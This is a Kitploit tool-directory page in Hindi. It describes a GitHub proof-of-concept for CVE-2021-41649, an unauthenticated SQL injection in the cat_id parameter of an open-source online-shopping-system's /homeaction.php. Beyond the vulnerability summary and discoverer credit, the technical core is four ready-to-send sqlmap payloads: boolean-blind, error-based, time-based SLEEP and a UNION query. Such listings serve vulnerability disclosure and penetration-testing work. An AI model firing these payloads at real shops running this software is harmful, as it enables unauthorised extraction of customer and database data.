Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41649 — CVE-2021-41649 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो cat_id पैरामीटर के माध्यम से online-shopping-system में अप्रमाणित SQL इंजेक्शन प्रदर्शित करता है, जिसमें बूलियन-आधारित, एरर-आधारित, टाइम-आधारित और UNION क्वेरी पेलोड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/mobiusbinary/cve-2021-41649
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmobiusbinary/cve-2021-41649

CVE-2021-41649

CVE-2021-41649 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो cat_id पैरामीटर के माध्यम से online-shopping-system में अप्रमाणित SQL इंजेक्शन प्रदर्शित करता है, जिसमें बूलियन-आधारित, एरर-आधारित, टाइम-आधारित और UNION क्वेरी पेलोड शामिल हैं।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41649

CVE-2021-41649 ऑनलाइन-शॉपिंग-सिस्टम में SQL इंजेक्शन

ऑनलाइन-शॉपिंग-सिस्टम अप्रमाणित त्रुटि/बूलियन-आधारित ब्लाइंड और त्रुटि-आधारित SQL इंजेक्शन हमलों के लिए संवेदनशील है।

/homeaction.php पेज पर cat_id पैरामीटर उपयोगकर्ता इनपुट को सैनिटाइज़ नहीं करता है, एक हमलावर अंतर्निहित MySQL डेटाबेस से संवेदनशील डेटा निकाल सकता है।

एप्लिकेशन का लिंक

online-shopping-system

प्रभावित घटक और पैरामीटर

यूआरएल: /homeaction.php
पैरामीटर: cat_id

POC

SQLMAP PAYLOADS

/homeaction.php पेज पर cat_id पैरामीटर

पैरामीटर: cat_id (POST अनुरोध) प्रकार: boolean-based blind शीर्षक: AND boolean-based blind - WHERE या HAVING खंड पेलोड: cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1

प्रकार: error-based शीर्षक: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY या GROUP BY खंड (FLOOR) पेलोड: cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1

प्रकार: time-based blind शीर्षक: MySQL >= 5.0.12 AND time-based blind (query SLEEP) पेलोड: cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1

प्रकार: UNION query शीर्षक: Generic UNION query (NULL) - 10 कॉलम पेलोड: cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

यदि POC छवि स्पष्ट नहीं है, तो कृपया GIF पर क्लिक करें जो बेहतर रिज़ॉल्यूशन में लोड होगी।

POC - proId

द्वारा खोजा गया

Jason Colyvas
MOBIUSBINARY
21 सितंबर, 2021

टूल डाउनलोड करें